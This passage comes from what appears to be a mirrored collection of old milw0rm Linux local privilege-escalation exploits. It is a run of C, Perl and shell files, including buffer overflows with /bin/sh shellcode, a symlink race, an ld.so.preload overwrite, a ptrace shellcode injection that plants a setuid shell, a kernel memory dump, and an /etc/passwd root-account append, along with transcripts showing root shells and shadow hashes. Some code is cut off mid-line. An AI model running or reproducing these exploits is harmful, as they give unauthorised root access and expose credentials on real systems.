entry.ut_type=LOGIN_PROCESS; 17 | strcpy(entry.ut_line,"/tmp/x"); 18 | entry.ut_time=0; 19 | strcpy(entry.ut_user,"badguy"); 20 | strcpy(entry.ut_host,"badhost"); 21 | entry.ut_addr=0; 22 | for(i=1;i<9;i++) { 23 | entry.ut_pid=(pid_t)( i + (int)getpid() ); 24 | sprintf(entry.ut_id,"bad%d",i); 25 | pututline(&entry); 26 | } 27 | } 28 | ' > /tmp/fillutmp.c 29 | 30 | cc -o /tmp/fillutmp /tmp/fillutmp.c 31 | 32 | echo 'Ask someone with group utmp privileges to do:' 33 | echo ' chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp' 34 | echo -n 'Press [RETURN] to continue... ' 35 | read ANS 36 | 37 | echo ' 38 | #include 39 | 40 | int main(int argc, char *argv[]) 41 | { 42 | while(1) 43 | { 44 | unlink("/tmp/x"); 45 | symlink(argv[1],"/tmp/x"); 46 | unlink("/tmp/x"); 47 | symlink(argv[2],"/tmp/x"); 48 | } 49 | } 50 | ' > /tmp/jigglelnk.c 51 | 52 | cc -o /tmp/jigglelnk /tmp/jigglelnk.c 53 | 54 | HOST=`hostname` # or simply localhost? 55 | echo "Which tty do you think a 'telnet $HOST' will use next?" 56 | echo "(Do that telnet and see...)" 57 | read TTY 58 | echo "You said it will be '$TTY' ..." 59 | 60 | ATK=/etc/debian_version # should be /etc/shadow 61 | 62 | echo "Starting symlink re-jiggler ..." 63 | /tmp/jigglelnk $TTY $ATK & 64 | JIG=$! 65 | 66 | LOOP=0 67 | while :; do 68 | ((LOOP = $LOOP + 1)) 69 | echo; echo; echo "Try = $LOOP" 70 | 71 | /tmp/fillutmp 72 | 73 | echo "Telnetting... if login succeeds, just exit for next try..." 74 | /usr/bin/telnet $HOST 75 | 76 | LS=`ls -ld $ATK` 77 | case "$LS" in 78 | *root*root* ) ;; # not done yet... 79 | * ) 80 | echo; echo 81 | echo "Success after $LOOP tries!" 82 | echo "$LS" 83 | echo; echo 84 | break 85 | ;; 86 | esac 87 | done 88 | 89 | kill $JIG 90 | rm /tmp/fillutmp /tmp/jigglelnk /tmp/x 91 | 92 | # ... 93 | # ~$ logout 94 | # Connection closed by foreign host. 95 | # Success after 12 tries! 96 | # -rw------- 1 psz tty 4 Oct 28 2006 /etc/debian_version 97 | 98 | # milw0rm.com [2008-12-01] 99 | -------------------------------------------------------------------------------- /linux/linux_exploits/741.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | #^^^^^^^^^^^^^^^^\....,,,,|:::::::____****** 3 | #HTGET <= 0.9.x local lame r00t exploit * 4 | #written by nekd0 of Unl0ck Research Team * 5 | #(c) .unl0ck research team 2004-2005. * 6 | # http://unl0ck.void.ru * 7 | #................/^^^^''''|:::::::----****** 8 | 9 | $shellcode = 10 | "\x31\xc0\x31\xdb\xb0\x17\xcd\x80". 11 | "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31". 12 | "\xc0\x88\x43\x07\x89\x5b\x08\x89". 13 | "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0". 14 | "\x0b\xcd\x80\xe8\xe6\xff\xff\xff". 15 | "/bin/sh"; 16 | 17 | $len = 288; 18 | $ret = 0xbfffd62a; #red hat 9.0 19 | $nop = "\x90"; 20 | $offset = 0 ; 21 | $vulnprog="/usr/bin/htget"; 22 | 23 | if (@ARGV == 1) { 24 | $offset = $ARGV[0];} 25 | 26 | if (!-u($vulnprog)){print "$vulnprog is not suid... exiting\n";exit();} 27 | 28 | for ($i=0; $i<($len-length($shellcode)-100);$i++) 29 | {$buffer .= $nop;} 30 | 31 | $buffer .= $shellcode; 32 | 33 | print ("Address: 0x",sprintf('%lx',($ret+$offset)),"\n"); 34 | 35 | $new_ret = pack('l',($ret + $offset)); 36 | 37 | for ($i+=length($shellcode); $i<$len; $i+=4) 38 | {$buffer .=$new_ret} 39 | 40 | exec("$vulnprog $buffer"); 41 | 42 | # milw0rm.com [2005-01-05] 43 | -------------------------------------------------------------------------------- /linux/linux_exploits/756.c: -------------------------------------------------------------------------------- 1 | /* 2 | This proof-of-concept demonstrates the existence of the vulnerability 3 | reported by iDEFENSE (iDEFENSE Security Advisory 01.14.05). 4 | It has been tested against exim-4.41 under Debian GNU/Linux. 5 | Note that setuid () is not included in the shellcode to avoid 6 | script-kidding. 7 | My RET is 0xbffffae4, but fb.pl can brute-force it for you. 8 | 9 | ----------- 10 | Brute Force fb.pl: 11 | ----------- 12 | 13 | #!/usr/bin/perl 14 | 15 | $cnt = 0xbffffa10; 16 | 17 | while (1) { 18 | $hex = sprintf ("0x%x", $cnt); 19 | $res = system ("./exploit $hex"); 20 | printf "$hex : $res\n"; 21 | $cnt += 4; 22 | } 23 | 24 | --------- 25 | exploit.c: 26 | --------- 27 | */ 28 | 29 | #define NOP 0x90 30 | #define TAMBUF 368 31 | #define INIC_SH 20 32 | #include 33 | 34 | int main (int argc, char **argv) { 35 | 36 | static char shellcode[]= 37 | "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89" 38 | "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e" 39 | "\x2f\x73\x68\x58"; 40 | 41 | char buffer [TAMBUF + 1]; 42 | char cadena [TAMBUF + 5]; 43 | int cont; 44 | unsigned long ret = strtoul (argv[1], NULL, 16); 45 | 46 | for (cont = 0; cont < TAMBUF / 4; cont++) 47 | *( (long *) buffer + cont) = ret; 48 | 49 | for (cont = 0; cont < strlen (shellcode); cont++) 50 | buffer [cont + INIC_SH] = shellcode [cont]; 51 | 52 | for (cont = 0; cont < INIC_SH; cont++) 53 | buffer [cont] = NOP; 54 | 55 | buffer [TAMBUF] = 0; 56 | printf ("RET = 0x%x\n", ret); 57 | strcpy (cadena, "::%A"); 58 | strcat (cadena, buffer); 59 | execl ("/usr/sbin/exim", "./exim", "-bh", cadena, (char *) 0); 60 | } 61 | 62 | // milw0rm.com [2005-01-15] 63 | -------------------------------------------------------------------------------- /linux/linux_exploits/7618.c: -------------------------------------------------------------------------------- 1 | /* 2 | * cve-2008-4113.c 3 | * 4 | * Linux Kernel < 2.6.26.4 SCTP kernel memory disclosure 5 | * Jon Oberheide 6 | * http://jon.oberheide.org 7 | * 8 | * Information: 9 | * 10 | * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113 11 | * 12 | * The sctp_getsockopt_hmac_ident function in net/sctp/socket.c in the Stream 13 | * Control Transmission Protocol (sctp) implementation in the Linux kernel 14 | * before 2.6.26.4, when the SCTP-AUTH extension is enabled, relies on an 15 | * untrusted length value to limit copying of data from kernel memory, which 16 | * allows local users to obtain sensitive information via a crafted 17 | * SCTP_HMAC_IDENT IOCTL request involving the sctp_getsockopt function. 18 | * 19 | * Notes: 20 | * 21 | * If SCTP AUTH is enabled (net.sctp.auth_enable = 1), this exploit allow an 22 | * unprivileged user to dump an arbitrary amount (DUMP_SIZE) of kernel memory 23 | * out to a file (DUMP_FILE). If SCTP AUTH is not enabled, the exploit will 24 | * trigger a kernel OOPS. 25 | */ 26 | 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | 35 | #ifndef SCTP_HMAC_IDENT 36 | #define SCTP_HMAC_IDENT 22 37 | #endif 38 | 39 | #define DUMP_SIZE 256*1024 40 | #define DUMP_FILE "mem.dump" 41 | 42 | int 43 | main(int argc, char **argv) 44 | { 45 | int ret, sock; 46 | FILE *dumpfile; 47 | char *memdump, *err; 48 | socklen_t memlen = DUMP_SIZE; 49 | 50 | memdump = malloc(DUMP_SIZE); 51 | if (!memdump) { 52 | err = "malloc(3) failed"; 53 | printf("[-] Error: %s (%s)\n", err, strerror(errno)); 54 | return 1; 55 | } 56 | memset(memdump, 0, DUMP_SIZE); 57 | 58 | printf("[+] creating IPPROTO_SCTP socket\n"); 59 | 60 | sock = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP); 61 | if (sock == -1) { 62 | err = "socket(2) failed"; 63 | printf("[-] Error: %s (%s)\n", err, strerror(errno)); 64 | return 1; 65 | } 66 | 67 | printf("[+] getting socket option SCTP_HMAC_IDENT with length of %d\n", memlen); 68 | 69 | ret = getsockopt(sock, SOL_SCTP, SCTP_HMAC_IDENT, memdump, &memlen); 70 | if (ret == -1) { 71 | err = "getsockopt(2) failed"; 72 | printf("[-] Error: %s (%s)\n", err, strerror(errno)); 73 | return 1; 74 | } 75 | 76 | printf("[+] dumping %d bytes of kernel memory to %s\n", memlen, DUMP_FILE); 77 | 78 | dumpfile = fopen(DUMP_FILE, "wb"); 79 | if (!dumpfile) { 80 | err = "fopen(3) failed"; 81 | printf("[-] Error: %s (%s)\n", err, strerror(errno)); 82 | return 1; 83 | } 84 | fwrite(memdump, 1, memlen, dumpfile); 85 | fclose(dumpfile); 86 | 87 | printf("[+] done.\n"); 88 | 89 | return 0; 90 | } 91 | 92 | // milw0rm.com [2008-12-29] 93 | -------------------------------------------------------------------------------- /linux/linux_exploits/7681.txt: -------------------------------------------------------------------------------- 1 | Package: xterm 2 | Version: 222-1etch2 3 | Severity: grave 4 | Tags: security patch 5 | Justification: user security hole 6 | 7 | 8 | DECRQSS Device Control Request Status String "DCS $ q" simply echoes 9 | (responds with) invalid commands. For example, 10 | perl -e 'print "\eP\$q\nbad-command\n\e\\"' 11 | would run bad-command. 12 | 13 | Exploitability is the same as for the "window title reporting" issue 14 | in DSA-380: include the DCS string in an email message to the victim, 15 | or arrange to have it in syslog to be viewed by root. 16 | 17 | Original: 18 | http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=510030 19 | 20 | Test: 21 | 22 | perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log 23 | cat bla.log 24 | 25 | If whoami gets executed you should update. 26 | 27 | # milw0rm.com [2009-01-06] 28 | -------------------------------------------------------------------------------- /linux/linux_exploits/776.c: -------------------------------------------------------------------------------- 1 | /* 2 | /usr/bin/trn local root exploit 3 | By ZzagorR - http://www.rootbinbash.com 4 | */ 5 | /* 6 | sh-2.05b$ ./trn 7 | usage : ./trn ret buf 8 | example : ./trn 0xbfffff64 9 | [+] mandrake 9.2 = 0xbfffff96 10 | [+] slackware 10.0.0= 0xbfffff98 11 | [+] slackware 9.1.0= 0xbfffff84 12 | sh-2.05b$ 13 | sh-2.05b$ ./trn 0xbfffff84 128 14 | [BOO %] 128 15 | [RET %] bfffff84 16 | sh-2.05b# 17 | sh-2.05b# id 18 | uid=0(root) gid=98(nobody) groups=98(nobody) 19 | sh-2.05b# cat /etc/shadow 20 | root:$1$N88/N.aP$dBWcFHiYCXXNb77Y5LPNK1:12705:0::::: 21 | TEST : 22 | MANDRAKE 9.2 23 | SLACKWARE 10.0.0 24 | SLACKWARE 9.1.0 25 | http://www.rootbinbash.com/d0kum4n/trn-test.txt 26 | BOO: 27 | $trn `perl -e 'print "A" x 120'` 28 | $trn `perl -e 'print "A" x 124'` 29 | $trn `perl -e 'print "A" x 128'` 30 | Segmentation fault 31 | BOO=128 32 | */ 33 | 34 | #include 35 | #include 36 | #define NEREDE "/usr/bin/trn" 37 | 38 | char caylarbeles[] = 39 | "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" 40 | "\x31\xc0\x50\x68\x2f\x2f\x73\x68" 41 | "\x68\x2f\x62\x69\x6e\x89\xe3\x50" 42 | "\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; 43 | 44 | int main(int argc, char *argv[]){ 45 | int bizim; 46 | char bufe[1000]; 47 | char *tayfasi; 48 | if (argc < 3) { 49 | printf ("{ trn l0c4l r00t 3xpl01t }\n"); 50 | printf ("{ By ZzagorR - http://www.rootbinbash.com }\n"); 51 | printf ("{ usage : %s ret buf }\n",argv[0]); 52 | printf ("{ example : %s 0xbfffff99 142 }\n",argv[0]); 53 | printf ("{ mandrake 9.2 = 0xbfffff96 }\n"); 54 | printf ("{ slackware 10.0.0 = 0xbfffff98 }\n"); 55 | printf ("{ slackware 9.1.0 = 0xbfffff84 }\n"); 56 | exit(1); 57 | }else{ 58 | unsigned long RET=strtoul(argv[1], NULL, 16); 59 | int BOO = atoi(argv[2]); 60 | printf ("[BOO %] %i\n",BOO); 61 | printf ("[RET %] %x\n",RET); 62 | tayfasi = bufe; 63 | memset(bufe, 0x41,256-strlen(caylarbeles)); 64 | sprintf(bufe+256-strlen(caylarbeles), "%s", caylarbeles); 65 | for ( bizim = BOO; bizim <= BOO+4; bizim+= 4 ) 66 | *(long*)(tayfasi+bizim) = RET; 67 | execl(NEREDE, NEREDE , bufe, NULL); 68 | } 69 | } 70 | 71 | // milw0rm.com [2005-01-26] 72 | -------------------------------------------------------------------------------- /linux/linux_exploits/779.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ## Had to remove local -r to get it to work via sh on my box 3 | ## Root's encrypted password was in toupper form but the 4 | ## super stated it worked fine for him (Gentoo with ncpfs 2.2.5) 5 | ## If it worked for you send an email to info@milw0rm.com /str0ke 6 | 7 | (echo 'head1 by super' 8 | echo -e '==============\n' 9 | (function head1(){ 10 | (local -r MNTDIR=~/mnt.$$ 11 | (mv ~/.nwclient ~/.nwclient.temp 12 | ln -sf $1 ~/.nwclient 13 | mkdir $MNTDIR)2>/dev/null 14 | (echo $1 15 | ncpmount $MNTDIR 16 | echo) 17 | (rmdir $MNTDIR 18 | rm ~/.nwclient 19 | mv .nwclient.temp .nwclient)2>/dev/null)} 20 | (for i in /etc/*shadow* 21 | do head1 $i 22 | done)))# 23 | 24 | # milw0rm.com [2005-01-30] 25 | -------------------------------------------------------------------------------- /linux/linux_exploits/7855.txt: -------------------------------------------------------------------------------- 1 | PostgreSQL UDF for command execution 2 | 3 | [1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html 4 | [2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/postgresqludfsys/lib_postgresqludf_sys_0.0.1.tar.gz 5 | 6 | mirror: http://exploit-db.com/sploits/2009-lib_postgresqludf_sys_0.0.1.tar.gz 7 | 8 | # milw0rm.com [2009-01-25] 9 | -------------------------------------------------------------------------------- /linux/linux_exploits/7856.txt: -------------------------------------------------------------------------------- 1 | MySQL UDF for command execution 2 | 3 | [1] http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html 4 | [2] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/mysqludfsys/lib_mysqludf_sys_0.0.3.tar.gz 5 | 6 | mirror: http://exploit-db.com/sploits/2009-lib_mysqludf_sys_0.0.3.tar.gz 7 | 8 | # milw0rm.com [2009-01-25] 9 | -------------------------------------------------------------------------------- /linux/linux_exploits/792.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright Kevin Finisterre 3 | * 4 | * ** DISCLAIMER ** I am in no way responsible for your stupidity. 5 | * ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code. 6 | * 7 | * ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING *** 8 | * ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses). 9 | * ** WARNING ** have a boot disk ready incase some thing goes wrong. 10 | * 11 | * Setuid Perl exploit by KF - kf_lists[at]secnetops[dot]com - 1/30/05 12 | * 13 | * this exploits a vulnerability in the PERLIO_DEBUG functionality 14 | * tested against sperl5.8.4 on Debian 15 | * 16 | * kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c 17 | * kfinisterre@jdam:~$ ls -al /etc/ld.so.preload 18 | * ls: /etc/ld.so.preload: No such file or directory 19 | * kfinisterre@jdam:~$ ./ex_perl 20 | * sperl needs fd script 21 | * You should not call sperl directly; do you need to change a #! line 22 | * from sperl to perl? 23 | * kfinisterre@jdam:~$ su - 24 | * jdam:~# id 25 | * uid=0(root) gid=0(root) groups=0(root) 26 | * jdam:~# rm /etc/ld.so.preload 27 | * 28 | */ 29 | 30 | 31 | #define PRELOAD "/etc/ld.so.preload" 32 | #include 33 | #include 34 | 35 | int main(int *argc, char **argv) 36 | { 37 | 38 | FILE *getuid; 39 | if(!(getuid = fopen("/tmp/getuid.c","w+"))) { 40 | printf("error opening file\n"); 41 | exit(1); 42 | } 43 | 44 | fprintf(getuid, "int getuid(){return 0;}\n" ); 45 | fclose(getuid); 46 | 47 | system("cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc"); 48 | 49 | putenv("PERLIO_DEBUG="PRELOAD); 50 | umask(001); // I'm rw-rw-rw james bitch! 51 | system("/usr/bin/sperl5.8.4"); 52 | FILE *ld_so_preload; 53 | 54 | char preload[] = { 55 | "/tmp/getuid.so\n" 56 | }; 57 | 58 | if(!(ld_so_preload = fopen(PRELOAD,"w+"))) { 59 | printf("error opening file\n"); 60 | exit(1); 61 | } 62 | fwrite(preload,sizeof(preload)-1,1,ld_so_preload); 63 | fclose(ld_so_preload); 64 | } 65 | 66 | // milw0rm.com [2005-02-07] 67 | -------------------------------------------------------------------------------- /linux/linux_exploits/796.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Local Lame R00T sploit for exim <= 4.42 4 | # by Dark Eagle 5 | # 6 | # My First Coding Release In bash )) 7 | 8 | # Unl0ck Research Team 9 | # 10 | # More Effective than C-code. 11 | # 12 | # @env.c content: 13 | # 14 | ################################################### 15 | # #include 16 | # #include 17 | # int main(int argc, char *argv[]) 18 | # { 19 | # char *addr_ptr; 20 | # addr_ptr = getenv(argv[1]); 21 | # printf("%s @ %p\n", argv[1], addr_ptr); 22 | # return 0; 23 | # } 24 | ################################################### 25 | 26 | gcc @env.c -o @env 27 | 28 | cp @env /usr/bin 29 | cd /usr/exim/bin 30 | 31 | CODE=`perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69 32 | \x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`;export CODE 33 | 34 | @env CODE 35 | echo "So, dude, starting..." 36 | echo "NoW Just Type Address Of CODE" 37 | 38 | read ADDRESS 39 | 40 | echo "You are typed: $ADDRESS" 41 | 42 | echo "Leeeeeeeeeeeeet'sssssssssss g000000000000000!!!!!!!!!" 43 | 44 | ./exim -bh ::%A`perl -e 'print pack('L','$ADDRESS') x 256'` 45 | 46 | # milw0rm.com [2005-02-07] 47 | -------------------------------------------------------------------------------- /linux/linux_exploits/816.c: -------------------------------------------------------------------------------- 1 | /* Not added to Local Non Poc section /str0ke */ 2 | 3 | #include 4 | #include 5 | #include 6 | // by lizard / lizstyle[at]gmail.com 7 | // greets go to slider/trog for helpin me 8 | // not suid by default ;( 9 | #define VULNTHING "/usr/bin/a2ps" 10 | #define DEFRET 0xbffffffa - strlen(sc) - strlen(VULNTHING) 11 | #define xnullbitch 1100 12 | //i`m not a asm guru so i ripped this shellcode 13 | //shellcode by man shadow 14 | char sc[] = 15 | "\x31\xC9" /* xor ecx,ecx */ 16 | "\x31\xDB" /* xor ebx,ebx */ 17 | "\x6A\x46" /* push byte 70 */ 18 | "\x58" /* pop eax */ 19 | "\xCD\x80" /* int 80h */ 20 | "\x51" /* push ecx */ 21 | "\x68\x2F\x2F\x73\x68" /* push 0x68732F2F */ 22 | "\x68\x2F\x62\x69\x6E" /* push 0x6E69622F */ 23 | "\x89\xE3" /* mov ebx,esp */ 24 | "\x51" /* push ecx */ 25 | "\x53" /* push ebx */ 26 | "\x89\xE1" /* mov ecx,esp */ 27 | "\x99" /* cdq */ 28 | "\xB0\x0B" /* mov al,11 */ 29 | "\xCD\x80"; /* int 80h */ 30 | 31 | int main(void) { 32 | 33 | int ctr = 0; 34 | char buffer[xnullbitch]; 35 | fprintf(stdout, "[*] 0x%8x\n", (long) DEFRET); 36 | 37 | for(ctr = 0; ctr < xnullbitch - 1; ctr += 4) 38 | *(long *) &buffer[ctr] = (long) DEFRET; 39 | 40 | buffer[xnullbitch - 1] = '\0'; 41 | 42 | if((setenv("HOME", buffer, 1)) == -1) { 43 | perror("setenv()"); 44 | exit(1); 45 | } 46 | 47 | if((setenv("TOPX", sc, 1)) == -1) { 48 | perror("setenv()"); 49 | exit(1); 50 | } 51 | 52 | if((execl(VULNTHING, VULNTHING, NULL)) == -1) { 53 | perror("execl()"); 54 | exit(1); 55 | } 56 | return(0); 57 | } 58 | 59 | // milw0rm.com [2005-02-13] 60 | -------------------------------------------------------------------------------- /linux/linux_exploits/824.c: -------------------------------------------------------------------------------- 1 | /* 2 | VisualBoyAdvanced 1.7.x BufferOver Flow exploit 3 | VBA - WEBSITE : vba.ngemu.com 4 | Found & coded by Qnix - Qnix[at]bsdmail[dot]org 5 | */ 6 | 7 | #include 8 | 9 | char shellcode[] = 10 | "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid() */ 11 | "\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd" 12 | "\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80" 13 | "\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0" 14 | "\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50" 15 | "\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89" 16 | "\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" 17 | "\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; 18 | 19 | 20 | unsigned long sp(void) 21 | { __asm__("movl %esp, %eax");} 22 | 23 | int main(int argc, char *argv[]) 24 | { 25 | int i, offset; 26 | long esp, ret, *addr_ptr; 27 | char *buffer, *ptr; 28 | 29 | offset = 0; 30 | esp = sp(); 31 | ret = esp - offset; 32 | 33 | if (argc >= 2) { 34 | printf("\n ************************************************ \n"); 35 | printf(" VisualBoyAdvanced 1.7.x BufferOver Flow exploit \n"); 36 | printf(" by Qnix[at]bsdmail[dot]org "); 37 | printf("\n ************************************************ \n\n"); 38 | printf("[~] Stack pointer (ESP) : 0x%x\n", esp); 39 | printf("[~] Offset from ESP : 0x%x\n", offset); 40 | printf("[~] Desired Return Addr : 0x%x\n\n", ret); 41 | } else { 42 | printf("\n ************************************************ \n"); 43 | printf(" VisualBoyAdvanced 1.7.x BufferOver Flow Exploit \n"); 44 | printf(" by Qnix[at]bsdmail[dot]org "); 45 | printf("\n ************************************************ \n\n"); 46 | printf("useage : ./vba-exp \n\n"); 47 | } 48 | 49 | buffer = malloc(2300); 50 | 51 | ptr = buffer; 52 | addr_ptr = (long *) ptr; 53 | for(i=0; i < 2300; i+=4) 54 | { *(addr_ptr++) = ret; } 55 | 56 | for(i=0; i < 1900; i++) 57 | { buffer[i] = '\x90'; } 58 | 59 | ptr = buffer + 1900; 60 | for(i=0; i < strlen(shellcode); i++) 61 | { *(ptr++) = shellcode[i]; } 62 | 63 | buffer[2300-1] = 0; 64 | 65 | execl(argv[1],"VisualBoyAdvance",buffer,0); 66 | 67 | free(buffer); 68 | 69 | return 0; 70 | } 71 | 72 | // milw0rm.com [2005-09-13] 73 | -------------------------------------------------------------------------------- /linux/linux_exploits/8673.c: -------------------------------------------------------------------------------- 1 | /* 2 | ptrace_attach privilege escalation exploit by s0m3b0dy 3 | 4 | [*] tested on Gentoo 2.6.29rc1 5 | 6 | grataz: 7 | Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo... 8 | 9 | email: s0m3b0dy1 (at) gmail.com 10 | */ 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | char shellcode[] = 28 | "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99" 29 | "\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" 30 | "\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff" 31 | "echo \"#include \nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;"; 32 | struct user_regs_struct322 { 33 | unsigned long ebx, ecx, edx, esi, edi, ebp, eax; 34 | unsigned short ds, __ds, es, __es; 35 | unsigned short fs, __fs, gs, __gs; 36 | unsigned long orig_eax, eip; 37 | unsigned short cs, __cs; 38 | unsigned long eflags, esp; 39 | unsigned short ss, __ss; 40 | }; 41 | 42 | main() 43 | { 44 | struct user_regs_struct322 regs; 45 | struct stat buf; 46 | int i,o; 47 | unsigned long * src; 48 | unsigned long * dst; 49 | char *env[2]; 50 | env[0]="/usr/bin/gpasswd"; // some suid file 51 | env[1]=0; 52 | if((o=fork()) == 0) 53 | { 54 | execve(env[0],env,0); 55 | exit(0); 56 | } 57 | if(ptrace(PTRACE_ATTACH,o,0,0)==-1) 58 | { 59 | printf("\n[-] Attach\n"); 60 | exit(0); 61 | } 62 | wait((int *)0); 63 | if (ptrace(PTRACE_GETREGS, o, NULL, ®s) == -1){ 64 | printf("\n[-] read registers\n"); 65 | exit(0); 66 | } 67 | printf( "[+] EIP - 0x%08lx\n", regs.eip); 68 | dst= (unsigned long *) regs.eip; 69 | src = (unsigned long *) shellcode; 70 | for(i=0;i>/etc/passwd' > /tmp/ipseclive.conn 29 | rm /tmp/ipseclive.conn 30 | su -l t00r 31 | 32 | # milw0rm.com [2009-07-13] 33 | -------------------------------------------------------------------------------- /linux/linux_exploits/914.c: -------------------------------------------------------------------------------- 1 | /* first release /str0ke */ 2 | /* 3 | local linux exploit within aeon-0.2a 4 | Coded by patr0n (security-tmp.h14.ru) 5 | */ 6 | 7 | 8 | #define BUFLEN 533 9 | #define PATH "/home/research/aeon-0.2a/aeon" 10 | 11 | char shellcode[]= 12 | "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" 13 | "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31" 14 | "\xc0\x88\x43\x07\x89\x5b\x08\x89" 15 | "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0" 16 | "\x0b\xcd\x80\xe8\xe6\xff\xff\xff" 17 | "/bin/sh"; 18 | 19 | int main(int argc, char *argv[]) { 20 | 21 | char evilbuf[BUFLEN]; 22 | int i; 23 | char *p,*av[2], *ev[3]; 24 | char *egg; 25 | 26 | egg=(char *)malloc(1000); 27 | sprintf(egg, "EGG="); 28 | memset(egg + 4, 0x90, 1000-1-strlen(shellcode)); 29 | sprintf(egg + 4 + 1000-1-strlen(shellcode), "%s", shellcode); 30 | 31 | long ret=0xbfffffff-5-strlen(egg)-strlen(PATH); 32 | 33 | p=evilbuf; 34 | bzero(evilbuf,sizeof(evilbuf)); 35 | strcpy(evilbuf,"HOME="); 36 | 37 | for(i=5;i<=BUFLEN;i+=4) 38 | *(long *)(p+i)=ret; 39 | 40 | av[0] = PATH; 41 | av[1] = 0; 42 | ev[0] = egg; 43 | ev[1] = evilbuf; 44 | ev[2] = 0; 45 | execve(*av, av, ev); 46 | 47 | return 0; 48 | 49 | } 50 | 51 | // milw0rm.com [2005-04-05] 52 | -------------------------------------------------------------------------------- /linux/linux_exploits/9208.txt: -------------------------------------------------------------------------------- 1 | PulseAudio setuid Local Privilege Escalation Vulnerability 2 | http://www.securityfocus.com/bid/35721 3 | Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and 4 | Yorick Koster 5 | -- 6 | 7 | Put files in /tmp/pulseaudio-exp (or change config.h). Must be on 8 | same fs as the pulseaudio binary. 9 | 10 | Goes faster if you already have a pulseaudio running ? :p 11 | 12 | Tested with success on Ubuntu 9.04 (x86-64) and slackware 12.2.0 13 | (x86) 14 | 15 | Ubuntu: 16 | ------------------------------------ 17 | $ ./c.sh 18 | $ ./pulseaudio-exp 19 | Please wait. 20 | [*] Seems we are uid = 0 and gid = 0 21 | [*] mv /tmp/pulseaudio-exp/shell /sbin/axx 22 | [*] chown root.root /sbin/axx 23 | [*] chmod 4755 /sbin/axx 24 | Try: /sbin/axx /bin/sh 25 | $ /sbin/axx /bin/sh 26 | # id 27 | uid=0(root) gid=0(root) 28 | groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(adm 29 | in),122(sambashare) 30 | # uname -a 31 | Linux ubuntu 2.6.28-13-generic #45-Ubuntu SMP Tue Jun 30 22:12:12 32 | UTC 2009 x86_64 GNU/Linux 33 | ------------------------------------ 34 | Slackware 35 | ------------------------------------ 36 | $ ./c.sh 37 | $ ./pulseaudio-exp 38 | Please wait. 39 | [*] Seems we are uid = 0 and gid = 0 40 | [*] mv /tmp/pulseaudio-exp/shell /sbin/axx 41 | [*] chown root.root /sbin/axx 42 | [*] chmod 4755 /sbin/axx 43 | Try: /sbin/axx /bin/sh 44 | $ /sbin/axx /bin/sh 45 | sh-3.1# id 46 | uid=0(root) gid=0(root) groups=17(audio),100(users),104(pulse-rt) 47 | sh-3.1# uname -a 48 | Linux slackware 2.6.27.7-smp #2 SMP Thu Nov 20 22:32:43 CST 2008 49 | i686 Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz 50 | GenuineIntel GNU/Linux 51 | ------------------------------------ 52 | 53 | download: http://exploit-db.com/sploits/2009-pulseaudio-exp.tar.gz 54 